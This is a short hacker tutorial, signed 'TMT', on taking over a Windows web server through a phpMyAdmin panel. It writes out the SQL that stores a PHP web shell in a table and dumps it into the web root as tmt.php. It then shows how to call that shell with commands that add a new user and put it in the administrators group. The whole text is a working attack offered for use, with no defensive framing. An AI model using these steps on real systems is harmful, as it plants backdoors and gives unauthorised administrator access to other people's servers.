# Rooting a box after injecting backdoor via PhPMyadmin panel
# Demo by: TMT
# Contact: t5643287648236429646329463242342@YAHOO.COM
# Y!M : t5643287648236429646329463242342@YAHOO.COM
# Http://tmt-today.com
################################################## #######
_Creat database
Query SQL
SELECT @@datadir
_And
first command :
CREATE TABLE tmt(
Stack TEXT) TYPE=MYISaM;
INSERT INTO tmt(stack)
VALUES(
'<pre><body bgcolor=silver><? @system($_REQUEST["tmt"]); ?></body></pre>');
Ok
================================================== ===========
sau khi Query SQl song
second command
_4 : select * into dumpfile 'C:/Program Files/VertrigoServ/www/tmt.php' from tmt;
__________
Open FF and Run
local/tmt.php?tmt= command
Now time to execute command
net user tmt tmt /add ( add news user)
net localgroup administrators tmt /add